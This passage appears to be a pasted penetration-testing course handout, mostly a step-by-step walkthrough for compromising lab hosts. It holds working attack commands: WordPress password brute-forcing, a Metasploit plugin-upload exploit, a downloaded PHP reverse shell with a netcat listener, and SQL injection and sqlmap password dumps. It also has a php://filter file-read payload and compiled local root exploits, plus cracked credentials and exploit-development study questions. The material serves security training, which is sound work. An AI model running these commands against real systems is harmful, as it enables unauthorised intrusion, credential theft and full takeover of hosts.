  886. for x in `cat /tmp/NetworkAudit/discovered_services/mysql_hosts` ; do nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables $x >> /tmp/NetworkAudit/scan/mysql_databases/$x ; done
  887. echo "Done with MySQL."
  888.  
  889.  
  890. # Add postgres nse scripts
  891. # References:
  892. # https://nmap.org/nsedoc/lib/pgsql.html
  893. # https://nmap.org/nsedoc/scripts/pgsql-brute.html
  894. #
  895.  
  896. echo " "
  897. echo " "
  898. sleep 1
  899. clear
  900. echo "Done, now check your results."
  901. sleep 2
  902. clear
  903. cd /tmp/NetworkAudit/scan/
  904. ls
  905.  
  906.  
  907.  
  908. ----------------------------------------------------------------------------------------------------------------------------
  909. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  910. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  911. --------------------------------------------------------------------------------------
  912.  
  913. ######################################
  914. ----------- ############### # Day 2: Attacking Hosts in the lab ################ -----------
  915. ######################################
  916.  
  917. ######################
  918. # Attacking Minotaur #
  919. ######################
  920.  
  921. Step 1: Portscan/Bannergrab the target host
  922. ---------------------------Type This-----------------------------------
  923. sudo nmap -sV 172.31.2.117
  924. -----------------------------------------------------------------------
  925.  
  926.  
  927.  
  928. Step 2: Vulnerability scan the web server
  929. ---------------------------Type This-----------------------------------
  930. nikto.pl -h 172.31.2.117
  931. -----------------------------------------------------------------------
  932.  
  933.  
  934.  
  935. Step 3: Directory brute-force the webserver
  936. ---------------------------Type This-----------------------------------
  937. dirb http://172.31.2.117 /usr/share/dirb/wordlists/big.txt
  938. -----------------------------------------------------------------------
  939.  
  940. ### dirb output ###
  941. ==> DIRECTORY: http://172.31.2.117/bull/
  942. -----------------------------------------------------------------------
  943.  
  944.  
  945. Step 4: Run wordpress vulnerability scanner
  946. ---------------------------Type This-----------------------------------
  947. wpscan --url 172.31.2.117/bull/ -r --enumerate u --enumerate p --enumerate t --enumerate tt
  948.  
  949.  
  950. cewl -w words.txt http://172.31.2.117/bull/
  951.  
  952.  
  953. cewl http://172.31.2.117/bull/ -d 1 -m 6 -w whateverbro.txt
  954.  
  955. wc -l whateverbro.txt
  956.  
  957. john --wordlist=whateverbro.txt --rules --stdout > words-john.txt
  958.  
  959. wc -l words-john.txt
  960.  
  961. wpscan --username bully --url http://172.31.2.117/bull/ --wordlist words-john.txt --threads 10
  962. -----------------------------------------------------------------------
  963.  
  964.  
  965.  
  966.  
  967.  
  968. Step 5: Attack vulnerable Wordpress plugin with Metasploit (just doing the exact same attack with MSF)
  969. ---------------------------Type This-----------------------------------
  970. msfconsole
  971.  
  972. use exploit/unix/webapp/wp_slideshowgallery_upload
  973.  
  974. set RHOST 172.31.2.117
  975.  
  976. set RPORT 80
  977.  
  978. set TARGETURI /bull
  979.  
  980. set WP_USER bully
  981.  
  982. set WP_PASSWORD Bighornedbulls
  983.  
  984. exploit
  985. -----------------------------------------------------------------------
  986.  
  987. Damn...that didn't work...Can't reverse shell from inside the network to a host in the VPN network range.
  988. This is a lab limitation that I implemented to stop students from compromising hosts in the lab network
  989. and then from the lab network attacking other students.
  990.  
  991.  
  992. ---------------------------Type This-----------------------------------
  993. wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
  994.  
  995. tar -zxvf php-reverse-shell-1.0.tar.gz
  996.  
  997. cd ~/toolz/php-reverse-shell-1.0/
  998.  
  999. nano php-reverse-shell.php
  1000. -----------------------------------------------------------------------
  1001. ***** change the $ip and $port variables to a host that you have already compromised in the network
  1002. ***** for this example I chose 172.31.2.64 and kept port 1234
  1003.  
  1004.  
  1005. ---------------------------Type This-----------------------------------
  1006. chmod 777 php-reverse-shell.php
  1007. cp php-reverse-shell.php ..
  1008. -----------------------------------------------------------------------
  1009.  
  1010.  
  1011.  
  1012. Browse to this link https://www.exploit-db.com/raw/34681/ and copy all of the text from it.
  1013. Paste the contents of this link into a file called wp_gallery_slideshow_146_suv.py
  1014. --------------------------Type This-----------------------------------
  1015. python wp_gallery_slideshow_146_suv.py -t http://172.31.2.117/bull/ -u bully -p Bighornedbulls -f php-reverse-shell.php
  1016.  
  1017. -----------------------------------------------------------------------
  1018.  
  1019.  
  1020.  
  1021. Set up netcat listener on previously compromised host
  1022. ---------------------------Type This-----------------------------------
  1023. ssh -l webmin 172.31.2.64
  1024. webmin1980
  1025.  
  1026.  
  1027. nc -lvp 1234
  1028. -----------------------------------------------------------------------
  1029.  
  1030.  
  1031.  
  1032.  
  1033. ---------------------Type This in your browser ------------------------
  1034. http://172.31.2.117/bull//wp-content/uploads/slideshow-gallery/php-reverse-shell.php
  1035. -----------------------------------------------------------------------
  1036.  
  1037.  
  1038. Now check your listener to see if you got the connection
  1039. ---------------------------Type This-----------------------------------
  1040. id
  1041.  
  1042. /sbin/ifconfig
  1043.  
  1044. python -c 'import pty;pty.spawn("/bin/bash")'
  1045.  
  1046. ---------------------------Type This-----------------------------------
  1047. cd /tmp
  1048. cat >> exploit2.c << out
  1049. -----------------------------------------------------------------------
  1050. **************paste in the content from here *****************
  1051. https://www.exploit-db.com/raw/37292/
  1052.  
  1053. **************hit enter a few times *****************
  1054.  
  1055. ---------------------------Type This-----------------------------------
  1056. out
  1057.  
  1058.  
  1059. gcc -o boom2 exploit2.c
  1060.  
  1061. ./boom2
  1062.  
  1063. id
  1064. -----------------------------------------------------------------------
  1065.  
  1066.  
  1067.  
  1068.  
  1069. ---------------------------Type This-----------------------------------
  1070. sudo nmap -sV 172.31.2.181
  1071. -----------------------------------------------------------------------
  1072. PORT STATE SERVICE VERSION
  1073. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
  1074.  
  1075.  
  1076. ---------------------------Type This-----------------------------------
  1077. sudo nmap -sU -p69,161 172.31.2.181
  1078. -----------------------------------------------------------------------
  1079. PORT STATE SERVICE
  1080. 69/udp closed tftp
  1081. 161/udp open snmp
  1082.  
  1083.  
  1084. ---------------------------Type This-----------------------------------
  1085. sudo apt-get -y install onesixtyone snmp
  1086.  
  1087. wget https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/wordlists-misc/wordlist-common-snmp-community-strings.txt
  1088.  
  1089. onesixtyone -c wordlist-common-snmp-community-strings.txt 172.31.2.181
  1090. ----------------------------------------------------------------------
  1091. Gives error "Community string too long". A little bit of google and I found this reference: https://github.com/trailofbits/onesixtyone/issues/1
  1092.  
  1093. ---------------------------Type This-----------------------------------
  1094. cat wordlist-common-snmp-community-strings.txt | grep -v TENmanUFactOryPOWER > snmp-community-strings.txt
  1095.  
  1096. onesixtyone -c snmp-community-strings.txt 172.31.2.181
  1097.  
  1098. snmpwalk -Os -c public -v 1 172.31.2.181
  1099. ---------------------------------------------------------------------
  1100.  
  1101. Username "eric" found in snmpwalk, and the string "There is a house in New Orleans they call it..."
  1102.  
  1103. Google the sentence, and I find out that the whole sentence is “There is a house in New Orleans they call it the rising sun”.
  1104.  
  1105. Try to SSH to the box using the credentials eric:therisingsun
  1106.  
  1107.  
  1108. ---------------------------Type This-----------------------------------
  1109. ssh -l eric 172.31.2.181
  1110. therisingsun
  1111.  
  1112. id
  1113. cat /etc/issue
  1114. uname -a
  1115. cat /etc/*release
  1116.  
  1117. ---------------------------Type This-----------------------------------
  1118. cat >> exploit.c << out
  1119.  
  1120. **************paste in the content from here *****************
  1121. https://www.exploit-db.com/raw/39166/
  1122.  
  1123.  
  1124. ------ hit enter a few times ------
  1125.  
  1126. ------ then type 'out' ----- this closes the file handle...
  1127.  
  1128.  
  1129.  
  1130. ---------------------------Type This-----------------------------------
  1131. gcc -o boom exploit.c
  1132.  
  1133. ./boom
  1134.  
  1135. id
  1136.  
  1137.  
  1138. ......YEAH - do the happy dance!!!!
  1139.  
  1140.  
  1141.  
  1142. How to go after 172.31.2.238
  1143. Reference: https://t0w3ntum.com/2017/01/07/baffle/
  1144.  
  1145.  
  1146. ---------------------------------------------------------------
  1147. sudo nmap -sV -p 3260 172.31.2.217
  1148.  
  1149.  
  1150. sudo apt install open-iscsi
  1151.  
  1152. sudo iscsiadm -m discovery -t st -p 172.31.2.217
  1153.  
  1154. sudo iscsiadm -m discovery -t st -p 172.31.2.217:3260
  1155.  
  1156. sudo iscsiadm -m node -p 172.31.2.217 --login
  1157.  
  1158. sudo /bin/bash
  1159.  
  1160. fdisk -l
  1161. ***** look for /dev/sda5 - Linux swap / Solaris *******
  1162.  
  1163. mkdir /mnt/217vm
  1164.  
  1165. mount /dev/sdb /mnt/217vm
  1166.  
  1167. cd /mnt/217vm
  1168.  
  1169. ls
  1170.  
  1171. cat flag1.txt
  1172.  
  1173. file bobsdisk.dsk
  1174.  
  1175. mkdir /media/bobsdisk
  1176.  
  1177. mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
  1178.  
  1179. /mnt/217vm# ls
  1180.  
  1181. cd /media/bobsdisk/
  1182.  
  1183. ls
  1184.  
  1185. cat ToAlice.eml
  1186.  
  1187. file bobsdisk.dsk
  1188.  
  1189. mkdir /media/bobsdisk
  1190.  
  1191. mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
  1192.  
  1193. /mnt/217vm# ls
  1194.  
  1195. cd /media/bobsdisk/
  1196.  
  1197. ls
  1198.  
  1199. cat ToAlice.eml
  1200.  
  1201. file ToAlice.csv.enc
  1202.  
  1203. file bobsdisk.dsk
  1204.  
  1205. pwd
  1206.  
  1207. mkdir /media/bobsdisk
  1208.  
  1209.  
  1210. mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
  1211.  
  1212. ls
  1213.  
  1214. cd /media/bobsdisk/
  1215.  
  1216. ls
  1217.  
  1218. openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
  1219.  
  1220. ls
  1221.  
  1222. cat ToAlice.eml | grep flag
  1223.  
  1224. openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
  1225.  
  1226. ls
  1227.  
  1228. cat ToAlice.eml
  1229. ***** look for supercalifragilisticoespialidoso ******
  1230.  
  1231. openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
  1232.  
  1233. supercalifragilisticoespialidoso
  1234.  
  1235.  
  1236. ls
  1237.  
  1238. cat ToAlice.csv
  1239.  
  1240. -----------------------------------------------------
  1241. Web Path,Reason
  1242. 5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site!
  1243. c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
  1244. flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?
  1245.  
  1246. -----------------------------------------------------
  1247.  
  1248. The hints are "Web Path" and "strangest URL" so let's try the long strings in the URL:
  1249. http://172.31.2.217/5560a1468022758dba5e92ac8f2353c0/
  1250. -- view source
  1251.  
  1252. Found this string in the source:
  1253. R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr
  1254. ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl
  1255. bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi
  1256. YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK
  1257. ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56
  1258. YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg
  1259. TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l
  1260. IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh
  1261. ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl
  1262. IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK
  1263.  
  1264. ------ https://www.base64decode.org/ -------
  1265. ------ Decoded, but didn't find a flag -----
  1266.  
  1267.  
  1268. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/
  1269. -- view source --
  1270. -- Nothing in source --
  1271.  
  1272. Browsed to the flag link:
  1273. view-source:http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=flag
  1274. -- view source --
  1275. -- Nothing in source --
  1276.  
  1277.  
  1278. Tried a PHP base64 decode with the URL:
  1279. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=welcome.php
  1280. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
  1281. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=party.php
  1282.  
  1283. ------ https://www.base64decode.org/ -------
  1284. Use the string found here:
  1285. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
  1286.  
  1287. -------------------------------------------------------------------
  1288. PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmxhZzwvaDE+CjxwPkhtbS4gTG9va2luZyBmb3IgYSBmbGFnPyBDb21lIG9uLi4uIEkgaGF2ZW4ndCBtYWRlIGl0IGVhc3kgeWV0LCBkaWQgeW91IHRoaW5rIEkgd2FzIGdvaW5nIHRvIHRoaXMgdGltZT88L3A+CjxpbWcgc3JjPSJ0cm9sbGZhY2UucG5nIiAvPgo8P3BocAovLyBPaywgb2suIEhlcmUncyB5b3VyIGZsYWchIAovLwovLyBmbGFnNHs0ZTQ0ZGIwZjFlZGMzYzM2MWRiZjU0ZWFmNGRmNDAzNTJkYjkxZjhifQovLyAKLy8gV2VsbCBkb25lLCB5b3UncmUgZG9pbmcgZ3JlYXQgc28gZmFyIQovLyBOZXh0IHN0ZXAuIFNIRUxMIQovLwovLyAKLy8gT2guIFRoYXQgZmxhZyBhYm92ZT8gWW91J3JlIGdvbm5hIG5lZWQgaXQuLi4gCj8+Cg==
  1289. -------------------------------------------------------------------
  1290. <?php
  1291. defined ('VIAINDEX') or die('Ooooh! So close..');
  1292. ?>
  1293. <h1>Flag</h1>
  1294. <p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
  1295. <img src="trollface.png" />
  1296. <?php
  1297. // Ok, ok. Here's your flag!
  1298. //
  1299. // flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
  1300. //
  1301. // Well done, you're doing great so far!
  1302. // Next step. SHELL!
  1303. //
  1304. //
  1305. // Oh. That flag above? You're gonna need it...
  1306. ?>
  1307.  
  1308.  
  1309.  
  1310.  
  1311.  
  1312. ============================================ Attacking another server because I need a reverse shell =========================================
  1313. ---------------------------------------------------------------------------------------------------------------------------------------------------------
  1314.  
  1315. Attack steps:
  1316. -------------
  1317.  
  1318.  
  1319.  
  1320. Step 1: Ping sweep the target network
  1321. -------------------------------------
  1322.  
  1323.  
  1324. ---------------------------Type This-----------------------------------
  1325. nmap -sP 172.31.2.0/24
  1326. -----------------------------------------------------------------------
  1327.  
  1328.  
  1329.  
  1330. - Found 3 hosts
  1331. 172.31.2.64
  1332. 172.31.2.217
  1333. 172.31.2.238
  1334.  
  1335.  
  1336.  
  1337. Step 2: Port scan target system
  1338. -------------------------------
  1339.  
  1340.  
  1341. ---------------------------Type This-----------------------------------
  1342. nmap -sV 172.31.2.64
  1343. -----------------------------------------------------------------------
  1344.  
  1345.  
  1346.  
  1347. -------------Scan Results--------------------------------------------
  1348. PORT STATE SERVICE VERSION
  1349. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
  1350. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  1351. 514/tcp filtered shell
  1352. 1037/tcp filtered ams
  1353. 6667/tcp open irc ngircd
  1354. Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  1355. --------------------------------------------------------------------
  1356.  
  1357.  
  1358. Step 3: Vulnerability Scan the webserver
  1359. ----------------------------------------
  1360.  
  1361.  
  1362. ---------------------------Type This-----------------------------------
  1363. cd ~/toolz/
  1364.  
  1365. rm -rf nikto*
  1366.  
  1367. git clone https://github.com/sullo/nikto.git Nikto2
  1368.  
  1369. cd Nikto2/program
  1370.  
  1371. perl nikto.pl -h 172.31.2.64
  1372. -----------------------------------------------------------------------
  1373.  
  1374.  
  1375. Step 4: Run dirbuster or similar directory bruteforce tool against the target
  1376. -----------------------------------------------------------------------------
  1377.  
  1378.  
  1379. ---------------------------Type This-----------------------------------
  1380. wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
  1381.  
  1382. perl Webr00t.pl -h 172.31.2.64 -v
  1383. -----------------------------------------------------------------------
  1384. or with dirbuster (dirb)
  1385.  
  1386. ---------------------------Type This-----------------------------------
  1387. git clone https://github.com/v0re/dirb.git
  1388.  
  1389. cd dirb/
  1390.  
  1391. ./configure
  1392.  
  1393. make
  1394.  
  1395. dirb
  1396.  
  1397. ./dirb http://172.31.2.64 wordlists/big.txt
  1398. -----------------------------------------------------------------------
  1399.  
  1400.  
  1401.  
  1402. Step 5: Browse the web site to look for clues
  1403. ---------------------------------------------
  1404. Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
  1405.  
  1406.  
  1407. ..... really didn't get much from here so we just opened the web page in a browser
  1408. http://172.31.2.64/
  1409.  
  1410. .....browsed to the webpage and saw that it pointed to:
  1411. http://172.31.2.64/jabc
  1412.  
  1413. ....clicked on documentation link and found hidden text that pointed to here:
  1414. http://172.31.2.64/jabcd0cs/
  1415.  
  1416. ....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:
  1417. https://www.exploit-db.com/exploits/32075/
  1418.  
  1419. Tried the sql injection described in exploit-db:
  1420. http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9
  1421.  
  1422. http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9
  1423.  
  1424.  
  1425.  
  1426. Tried to run sqlmap against the target
  1427.  
  1428.  
  1429. ---------------------------Type This-----------------------------------
  1430. cd sqlmap-dev/
  1431. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql
  1432.  
  1433. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql
  1434.  
  1435. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql
  1436.  
  1437. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql
  1438.  
  1439. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql
  1440. -----------------------------------------------------------------------
  1441.  
  1442.  
  1443.  
  1444. FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)
  1445. FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net
  1446.  
  1447.  
  1448.  
  1449. ---------------------------Type This-----------------------------------
  1450. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql
  1451.  
  1452. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql
  1453. -----------------------------------------------------------------------
  1454.  
  1455. username: webmin
  1456. hash: b78aae356709f8c31118ea613980954b
  1457.  
  1458. https://hashkiller.co.uk/md5-decrypter.aspx
  1459.  
  1460. hash: b78aae356709f8c31118ea613980954b
  1461. pass: webmin1980
  1462.  
  1463.  
  1464. ok - /phpmyadmin and /webmin both did not work in the browser but these credentials worked for SSH.
  1465.  
  1466.  
  1467.  
  1468. ---------------------------Type This-----------------------------------
  1469. ssh -l webmin 172.31.2.64
  1470. webmin1980
  1471.  
  1472. id
  1473.  
  1474. cat /etc/*release
  1475. -----------------------------------------------------------------------
  1476.  
  1477.  
  1478.  
  1479. ....tired of not having a real command shell...
  1480.  
  1481.  
  1482. ---------------------------Type This-----------------------------------
  1483. python -c 'import pty;pty.spawn("/bin/bash")'
  1484.  
  1485.  
  1486. cd /tmp
  1487.  
  1488. pwd
  1489.  
  1490.  
  1491. cat >> exploit.c << out
  1492.  
  1493. **************paste in the content from here *****************
  1494. https://www.exploit-db.com/raw/39166/
  1495.  
  1496.  
  1497. ------ hit enter a few times ------
  1498.  
  1499. ------ then type 'out' ----- this closes the file handle...
  1500.  
  1501.  
  1502.  
  1503. ---------------------------Type This-----------------------------------
  1504. gcc -o boom exploit.c
  1505.  
  1506. ./boom
  1507. -----------------------------------------------------------------------
  1508.  
  1509.  
  1510. ------------exploit failed, damn let's try another one ---------
  1511.  
  1512.  
  1513.  
  1514. ---------------------------Type This-----------------------------------
  1515. cat >> exploit2.c << out
  1516.  
  1517. **************paste in the content from here *****************
  1518. https://www.exploit-db.com/raw/37292/
  1519.  
  1520.  
  1521. out
  1522.  
  1523.  
  1524. gcc -o boom2 exploit2.c
  1525.  
  1526. ./boom2
  1527.  
  1528. id
  1529.  
  1530.  
  1531. ......YEAH - do the happy dance!!!!
  1532. =============================================== Now back to the previous server ==============================================================
  1533.  
  1534.  
  1535.  
  1536.  
  1537. #######################################
  1538. ----------- ############### # Day 3: Intro to Exploit Development ################ -----------
  1539. #######################################
  1540.  
  1541. The first exploit
  1542. https://s3.amazonaws.com/infosecaddictsfiles/SLmail5-5-Exploit.zip
  1543.  
  1544. SLMail Scripts Questions
  1545.  
  1546. SLmail1.py
  1547. How do you start SLMail?
  1548. What do you have to be careful of when attaching your debugger to the application?
  1549. How many As are you sending to the application?
  1550.  
  1551. SLmail2.py
  1552. What tool(s) can be used to generate a cyclic pattern?
  1553. What port are we attacking?
  1554. What verb are we attacking?
  1555.  
  1556. SLmail3.py
  1557. What is the value contained in EIP?
  1558. What is the portion of the cyclic pattern that we must search for?
  1559. What is the distance to EIP?
  1560.  
  1561. SLmail4.py
  1562. What do you overwrite EIP with in this script?
  1563. What is the length of your shellcode in this script?
  1564. What is the difference between SOCK_STREAM and SOCK_DGRAM?
  1565.  
  1566. SLmail5.py
  1567. What is struct.pack and why are we using it?
  1568. What where is our JMP ESP coming from?
  1569. What is the length of our shellcode in this script?
  1570.  
  1571. SLmail6.py
  1572. Why do you subtract the top of ESP from the bottom of ESP in this script?
  1573. What is the length of our shellcode in this script?
  1574. What is the distance to EIP in this script?
  1575.  
  1576.  
  1577. SLmail7.py
  1578. How do you test for bad characters?
  1579. What are the bad characters in this script?
  1580. What is the address of the JMP ESP in this script and what DLL does it come from?
  1581.  
  1582.  
  1583. SLmail8.py
  1584. What is DEP and how do you disable it?
  1585. What is the purpose of the stack adjustment?
  1586. What is the purpose of the NOP sled?
  1587.  
  1588.  
  1589. If you got through SLMail comfortably - then try the script below.
  1590. https://s3.amazonaws.com/infosecaddictsfiles/ff.zip
  1591.  
  1592.  
  1593. Analysis of the exploit code:
  1594. https://www.exploit-db.com/exploits/15689/
  1595. What is the target platform that this exploit works against?
  1596. What is the variable name for the distance to EIP?
  1597. What is the actual distance to EIP in bytes?
  1598. Describe what is happening in the variable ‘junk2’?
  1599.  
  1600. Analysis of the training walk-through based on EID: 15689:
  1601. https://s3.amazonaws.com/infosecaddictsfiles/ff.zip
  1602.  
  1603. ff1.py
  1604. What does the sys module do?
  1605. What is sys.argv[1] and sys.argv[2]?
  1606. What application entry point is being attacked in this script?
  1607.  
  1608. ff2.py
  1609. Explain what is happening in lines 18 - 20
  1610. What is pattern_create.rb doing and where can I find it?
  1611. Why can’t I just double click the file to run this script?
  1612.  
  1613. ff3.py
  1614. Explain what is happening in lines 17 - to 25?
  1615. Explain what is happening in lines 30 - to 32?
  1616. Why is everything below line 35 commented out?
  1617.  
  1618. ff4.py
  1619. Explain what is happening in lines 13 - to 15.
  1620. Explain what is happening in line 19.
  1621. Why is everything below line 35 commented out?
  1622.  
  1623. Ff5.py
  1624. Explain what is happening in line 15.
  1625. What is struct.pack?.
  1626. How big is the shellcode in this script?
  1627.  
  1628. ff6.py
  1629. What is the distance to EIP?
  1630. How big is the shellcode in this script?
  1631. What is the total byte length of the data being sent to this app?
  1632.  
  1633. ff7.py
  1634. What is a tuple in python? Unchangeable list
  1635. How big is the shellcode in this script? 1000 Bytes
  1636. Did your app crash in from this script? No
  1637.  
  1638. ff8.py
  1639. How big is the shellcode in this script?
  1640. What is try/except in python?
  1641. What is socket.SOCK_STREAM in Python?
  1642.  
  1643. ff9.py
  1644. What is going on in lines 19 and 20?
  1645. What is the length of the NOPs?
  1646. What is socket.SOCK_STREAM in Python?
  1647.  
  1648. ff010.py
  1649. What is going on in lines 18 - 20?
  1650. How would a stack adjustment help this script?
Add Comment
Please, Sign In to add comment